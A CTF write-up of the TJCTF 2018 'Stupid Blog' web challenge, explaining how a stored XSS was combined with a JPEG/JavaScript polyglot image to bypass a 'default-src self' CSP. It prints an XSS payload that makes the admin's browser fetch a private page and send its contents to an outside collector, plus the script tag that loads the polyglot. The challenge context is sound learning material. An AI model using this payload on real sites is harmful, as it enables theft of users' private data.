Stupid Blog

TJCTF 2018 - Web (130 pts).

TJCTF 2018: Stupid Blog

Challenge details

Event Challenge Category Points Solves
TJCTF 2018 Stupid Blog Web 130 22 solves


Author: okulkarni

I created this blog site, but it doesn’t do much. I did hide a flag on here though. Maybe you can convince the admin user to give it to you?


Stupid Blog was a stored XSS challenge, where you manage to bypass the CSP using a JPEG file.


Find the XSS

Once, on the website you have two possibilities, register and login. So I create and account and log me in.


After being logged in, three more possibilities, upload a profile picture (JPEG/PNG), set a post on your “blog” and report a user. Because I had a similar challenge in the EasyCTF (Fumblr), I immediately thought of an XSS.


So I tested a XSS in the post, it was well injected, but not executed… The fault of the very strict CSP.


content-security-policy: default-src 'self'

Now, I know that I need to bypass the CSP to execute Javascript on my profile page. So, when I report my account to the admin, he will execute it.

Bypass the CSP

Since we have an image upload and a strict CSP to bypass, I thought of an article from Gareth Heyes on PortSwigger about that. So I reused his PoC image to bypass the CSP.

His PoC contains among other things, this Javascript:

*/=alert("Burp rocks.");/*

I replace it with my payload:

*/=x=new XMLHttpRequest();"GET","admin",false);x.send(null);document.location=""+x.responseText;/*

The payload will force the admin to GET his blog page and send the entire content to

Next, we need to use the XSS to import our polyglot JPEG as a script, to do so, I post <script charset="ISO-8859-1" src="ggg/pfp"></script> on my blog.

The last step is to report my user to the admin, and wait for him to go on my profile.


After a few minutes a request was sent to my beeceptor by the admin \o7


It contains the whole admin page, the flag was in.